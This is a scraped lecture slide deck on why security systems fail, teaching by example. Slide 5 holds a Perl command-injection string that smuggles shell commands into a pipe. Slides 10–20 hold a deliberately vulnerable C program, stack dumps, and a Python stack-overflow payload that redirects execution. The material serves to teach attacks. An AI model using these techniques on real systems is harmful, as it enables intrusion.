1 / 24

Why Security Systems Fail

Why Security Systems Fail. Capability List. Access Control List. ALL STATES. UNSAFE / UNDEFINED STATES. SAFE STATES. #!/usr/bin/perl # funky CGI script example $dest = "foo1"; # pretend this is the destination address from the user

kasi
Download Presentation

Why Security Systems Fail

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. Why Security Systems Fail

  2. Capability List

  3. Access Control List

  4. ALL STATES UNSAFE / UNDEFINED STATES SAFE STATES

  5. #!/usr/bin/perl # funky CGI script example $dest = "foo1"; # pretend this is the destination address from the user open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail print MAIL "To: $dest\nFrom: me\n\nHi there!\n"; close MAIL; !/usr/bin/perl # funky CGI script example $dest = "foo1; echo 'this could be bad!';find . -name '*.c' -print;"; open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail print MAIL "To: $dest\nFrom: me\n\nHi there!\n"; close MAIL;

  6. /usr/bin/perl –w # (1) quit unless we have the correct number of command-line args $num_args = $#ARGV + 1; if ($num_args != 2) { print "\nUsage: name.pl email-address brief-message\n"; exit; } # (2) we got two command line args, so assume it’s address $dest=$ARGV[0]; $content=$ARGV[1]; my $sendmail = "/usr/sbin/sendmail -t"; #open (MAIL,"| /bin/cat >$dest "); # pretend this was a call to sendmail open (MAIL,"|$sendmail") or die "Cannot open sendmail: $!"; print MAIL "To: $dest\n"; print MAIL "From: me\n"; print MAIL "Subject: test\n"; print MAIL "Content-type: text/plain\n\n"; print MAIL $content; close MAIL; Run it with ./tryit.pl ccpalmer “Some long message here inside quotes” Could you find a way to trick the perl script into mailing you some file that it shouldn’t???

  7. “Never fly in a plane designed by an optimist.”

  8. name[9] degree[4] … 0 0 0 0 0 0 0 0 0 0 0 0 0 0 strcpy(name,”charles”); strcpy(degree,”PhD”); … 0 ‘c’ ‘h’ ‘a’ ‘r’ ‘l’ ‘e’ ‘s’ 0 0 ‘P’ ‘h’ ‘D’ 0 printf(name); charles PhD printf(degree);

  9. name[9] degree[4] … 0 0 0 0 0 0 0 0 0 0 0 0 0 0 strcpy(name,”charleton”); 0 ‘c’ ‘h’ ‘a’ ‘r’ ‘l’ ‘e’ ‘t’ ‘o’ ‘n’ 0 0 0 0 … strcpy(degree,”PhD”); 0 ‘c’ ‘h’ ‘a’ ‘r’ ‘l’ ‘e’ ‘t’ ‘o’ ‘n’ ‘P’ ‘h’ ‘D’ 0 … printf(name); charletonPhD PhD printf(degree);

  10. #include <stdio.h> #include <stdlib.h> #include <string.h> void secret1(void) { puts("You found the secret function No. 1!\n"); } int main () { char string[2]; puts("Input: "); scanf("%s", string); printf("You entered %s.\n", string); return 0; }

  11. At startup of poof 0x0000000100000e52 <main+0>: push %rbp /* entry to main() */ 0x0000000100000e53 <main+1>: mov %rsp,%rbp 0x0000000100000e56 <main+4>: sub $0x10,%rsp 0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi 0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */ 0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi 0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi 0x0000000100000e71 <main+31>: mov $0x0,%eax 0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */ 0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi 0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi 0x0000000100000e86 <main+52>: mov $0x0,%eax 0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */ 0x0000000100000e90 <main+62>: mov $0x0,%eax 0x0000000100000e95 <main+67>: leaveq 0x0000000100000e96 <main+68>: retq rip 0x000100000e52 rbp 0x7fff5fbff828 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x20 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

  12. Before call to puts() 0x0000000100000e52 <main+0>: push %rbp /* entry to main() */ 0x0000000100000e53 <main+1>: mov %rsp,%rbp 0x0000000100000e56 <main+4>: sub $0x10,%rsp 0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi 0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */ 0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi 0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi 0x0000000100000e71 <main+31>: mov $0x0,%eax 0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */ 0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi 0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi 0x0000000100000e86 <main+52>: mov $0x0,%eax 0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */ 0x0000000100000e90 <main+62>: mov $0x0,%eax 0x0000000100000e95 <main+67>: leaveq 0x0000000100000e96 <main+68>: retq rip 0x000100000e61 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

  13. Just inside of puts() 0x0000000100000e52 <main+0>: push %rbp /* entry to main() */ 0x0000000100000e53 <main+1>: mov %rsp,%rbp 0x0000000100000e56 <main+4>: sub $0x10,%rsp 0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi 0x0000000100000e61 <main+15>: callq 0x100000ea4 (ONE INSTRUCTION IN/* puts () */ 0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi 0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi 0x0000000100000e71 <main+31>: mov $0x0,%eax 0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */ 0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi 0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi 0x0000000100000e86 <main+52>: mov $0x0,%eax 0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */ 0x0000000100000e90 <main+62>: mov $0x0,%eax 0x0000000100000e95 <main+67>: leaveq 0x0000000100000e96 <main+68>: retq rip 0x000100000ea4 rbp 0x7fff5fbff810 rsp 0x7fff5fbff7f8 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

  14. Just after return from puts() 0x0000000100000e52 <main+0>: push %rbp /* entry to main() */ 0x0000000100000e53 <main+1>: mov %rsp,%rbp 0x0000000100000e56 <main+4>: sub $0x10,%rsp 0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi 0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */ 0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi 0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi 0x0000000100000e71 <main+31>: mov $0x0,%eax 0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */ 0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi 0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi 0x0000000100000e86 <main+52>: mov $0x0,%eax 0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */ 0x0000000100000e90 <main+62>: mov $0x0,%eax 0x0000000100000e95 <main+67>: leaveq 0x0000000100000e96 <main+68>: retq rip 0x000100000e66 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x66 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

  15. Just inside scanf( ) 0x0000000100000e52 <main+0>: push %rbp /* entry to main() */ 0x0000000100000e53 <main+1>: mov %rsp,%rbp 0x0000000100000e56 <main+4>: sub $0x10,%rsp 0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi 0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */ 0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi 0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi 0x0000000100000e71 <main+31>: mov $0x0,%eax 0x0000000100000e76 <main+36>: callq 0x100000eaa (ONE INSTRUCTION IN) /* scanf () */ 0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi 0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi 0x0000000100000e86 <main+52>: mov $0x0,%eax 0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */ 0x0000000100000e90 <main+62>: mov $0x0,%eax 0x0000000100000e95 <main+67>: leaveq 0x0000000100000e96 <main+68>: retq rip 0x000100000e66 rsi 0x7fff5fbff800 rbp 0x7fff5fbff810 rsp 0x7fff5fbff7f8 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff808: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff810: 0x28 0xf8 0xbf 0x5f 0xff 0x7f 0x00 0x00 0x7fff5fbff818: 0x38 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

  16. After return from scanf ( ) 0x0000000100000e52 <main+0>: push %rbp /* entry to main() */ 0x0000000100000e53 <main+1>: mov %rsp,%rbp 0x0000000100000e56 <main+4>: sub $0x10,%rsp 0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi 0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */ 0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi 0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi 0x0000000100000e71 <main+31>: mov $0x0,%eax 0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */ 0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi 0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi 0x0000000100000e86 <main+52>: mov $0x0,%eax 0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */ 0x0000000100000e90 <main+62>: mov $0x0,%eax 0x0000000100000e95 <main+67>: leaveq 0x0000000100000e96 <main+68>: retq rip 0x000100000e7b rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

  17. Just before stack cleanup 0x0000000100000e52 <main+0>: push %rbp /* entry to main() */ 0x0000000100000e53 <main+1>: mov %rsp,%rbp 0x0000000100000e56 <main+4>: sub $0x10,%rsp 0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi 0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */ 0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi 0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi 0x0000000100000e71 <main+31>: mov $0x0,%eax 0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */ 0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi 0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi 0x0000000100000e86 <main+52>: mov $0x0,%eax 0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */ 0x0000000100000e90 <main+62>: mov $0x0,%eax 0x0000000100000e95 <main+67>: leaveq 0x0000000100000e96 <main+68>: retq rip 0x000100000e95 rbp 0x7fff5fbff810 rsp 0x7fff5fbff800 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00

  18. And ready to return to the operating system? 0x0000000100000e52 <main+0>: push %rbp /* entry to main() */ 0x0000000100000e53 <main+1>: mov %rsp,%rbp 0x0000000100000e56 <main+4>: sub $0x10,%rsp 0x0000000100000e5a <main+8>: lea 0x75(%rip),%rdi 0x0000000100000e61 <main+15>: callq 0x100000ea4 /* puts () */ 0x0000000100000e66 <main+20>: lea -0x10(%rbp),%rsi 0x0000000100000e6a <main+24>: lea 0x6d(%rip),%rdi 0x0000000100000e71 <main+31>: mov $0x0,%eax 0x0000000100000e76 <main+36>: callq 0x100000eaa /* scanf () */ 0x0000000100000e7b <main+41>: lea -0x10(%rbp),%rsi 0x0000000100000e7f <main+45>: lea 0x5b(%rip),%rdi 0x0000000100000e86 <main+52>: mov $0x0,%eax 0x0000000100000e8b <main+57>: callq 0x100000e9e /* printf () */ 0x0000000100000e90 <main+62>: mov $0x0,%eax 0x0000000100000e95 <main+67>: leaveq 0x0000000100000e96 <main+68>: retq rip 0x000100000e96 rbp 0x414141414141 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 ?

  19. Hello secret1( ) !!! 0x0000000100000e40 <secret1+0>: push %rbp 0x0000000100000e41 <secret1+1>: mov %rsp,%rbp 0x0000000100000e44 <secret1+4>: lea 0x65(%rip),%rdi # 0x100000eb0 0x0000000100000e4b <secret1+11>: callq 0x100000ea4 <dyld_stub_puts> 0x0000000100000e50 <secret1+16>: leaveq 0x0000000100000e51 <secret1+17>: retq rip 0x000100000e40 rbp 0x414141414141 rsp 0x7fff5fbff818 0x7fff5fbff7f8: 0x7b 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff800: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff808: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff810: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x7fff5fbff818: 0x40 0x0e 0x00 0x00 0x01 0x00 0x00 0x00 0x7fff5fbff820: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7fff5fbff828: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 ?

  20. $ poof Input: A You entered A. $ cat poop import struct rip = 0x0000000100000e40 print("A"*24 + struct.pack("<q", rip)) $ python poop | poof Input: You entered AAAAAAAAAAAAAAAAAAAAAAAA@^N. You found the secret function No. 1! Segmentation fault $

  21. And speaking of passwords … • 4.7% of users have the password password; • 8.5% have the passwords password or 123456; • 9.8% have the passwords password, 123456 or 12345678; • 14% have a password from the top 10 passwords • 40% have a password from the top 100 passwords • 79% have a password from the top 500 passwords • 91% have a password from the top 1000 passwords From https://xato.net/passwords/more-top-worst-passwords/#.VAh-1Esc8pw

More Related